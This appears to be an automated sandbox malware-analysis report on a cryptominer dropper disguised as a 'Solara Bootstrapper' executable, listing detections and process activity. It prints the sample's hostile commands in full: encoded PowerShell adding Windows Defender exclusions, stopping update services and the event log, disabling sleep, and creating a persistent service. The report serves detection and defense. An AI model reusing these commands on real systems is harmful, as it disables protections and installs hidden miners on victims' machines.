Edit tour

Windows Analysis Report
Solara Bootstrapper.exe

Overview

General Information

Sample name:	Solara Bootstrapper.exe
Analysis ID:	1585414
MD5:	00a1864355a5ea47902e5757c0d87fd9
SHA1:	4be5647308e0925fb00fae068cb4a89a8a449afc
SHA256:	4289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39
Tags:	CoinMinerexeuser-aachum
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Encrypted powershell cmdline option found

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Solara Bootstrapper.exe (PID: 5516 cmdline: "C:\Users\user\Desktop\Solara Bootstrapper.exe" MD5: 00A1864355A5EA47902E5757C0D87FD9)

powershell.exe (PID: 348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

kx new.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)

powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Kawpow new.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)

powershell.exe (PID: 7336 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7872 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 7792 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7896 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7936 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8152 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7300 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2820 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer.exe (PID: 7504 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

sc.exe (PID: 7396 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3620 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7792 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7884 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xmr new.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)

powershell.exe (PID: 7404 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 8084 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 8000 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8112 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8160 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4676 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7272 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 5960 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3116 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3772 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer.exe (PID: 7464 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

sc.exe (PID: 7968 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7956 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SolaraBootstrapper.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

eejhedztifcv.exe (PID: 7948 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: FB6A3B436E9F9402937D95F755B62F91)

eejhedztifcv.exe (PID: 7612 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: FB6A3B436E9F9402937D95F755B62F91)

cleanup

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7300, ProcessName: powercfg.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7336, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 3620, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7792, ProcessName: sc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T16:09:11.358836+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	140.82.121.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Solara Bootstrapper.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\kx new.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: Solara Bootstrapper.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\kx new.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Solara Bootstrapper.exe

Joe Sandbox ML: detected

Source: Solara Bootstrapper.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2

Source:	Binary string: T].PdBB?0_$u3J~7 source: Solara Bootstrapper.exe, 00000000.00000002.2100460502.0000000003887000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A4980DCE0 FindFirstFileExW,	2_2_0000019A4980DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C54DCE0 FindFirstFileExW,	15_2_000001F43C54DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589BDCE0 FindFirstFileExW,	53_2_000001E8589BDCE0
